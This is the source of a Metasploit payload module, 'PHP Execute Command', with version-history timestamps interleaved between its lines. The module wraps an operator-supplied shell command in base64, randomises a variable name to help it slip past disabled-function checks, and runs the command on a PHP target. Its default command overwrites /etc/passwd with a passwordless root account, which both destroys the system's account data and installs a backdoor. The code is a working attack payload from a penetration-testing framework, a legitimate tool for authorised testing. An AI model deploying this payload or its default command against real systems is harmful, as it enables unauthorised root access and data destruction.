metasploit-framework/modules/payloads/singles/php/exec.rb

53 lines
1.3 KiB
Ruby
Raw Normal View History

##
2017-07-24 13:26:21 +00:00
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/payload/php'
require 'msf/core/handler/bind_tcp'
require 'msf/base/sessions/command_shell'
2016-03-08 13:02:44 +00:00
module MetasploitModule
2015-03-09 20:44:14 +00:00
CachedSize = :dynamic
2013-08-30 21:28:54 +00:00
include Msf::Payload::Single
include Msf::Payload::Php
def initialize(info = {})
super(merge_info(info,
'Name' => 'PHP Execute Command ',
'Description' => 'Execute a single system command',
'Author' => [ 'egypt' ],
'License' => BSD_LICENSE,
'Platform' => 'php',
'Arch' => ARCH_PHP
))
register_options(
[
OptString.new('CMD', [ true, "The command string to execute", 'echo "toor::0:0:::/bin/bash">/etc/passwd' ]),
])
2013-08-30 21:28:54 +00:00
end
def php_exec_cmd
cmd = Rex::Text.encode_base64(datastore['CMD'])
dis = '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
shell = <<-END_OF_PHP_CODE
2017-02-02 20:53:53 +00:00
#{php_preamble(disabled_varname: dis)}
2013-08-30 21:28:54 +00:00
$c = base64_decode("#{cmd}");
2017-02-02 20:53:53 +00:00
#{php_system_block(cmd_varname: "$c", disabled_varname: dis)}
2013-08-30 21:28:54 +00:00
END_OF_PHP_CODE
return Rex::Text.compress(shell)
end
#
# Constructs the payload
#
def generate
return php_exec_cmd
end
end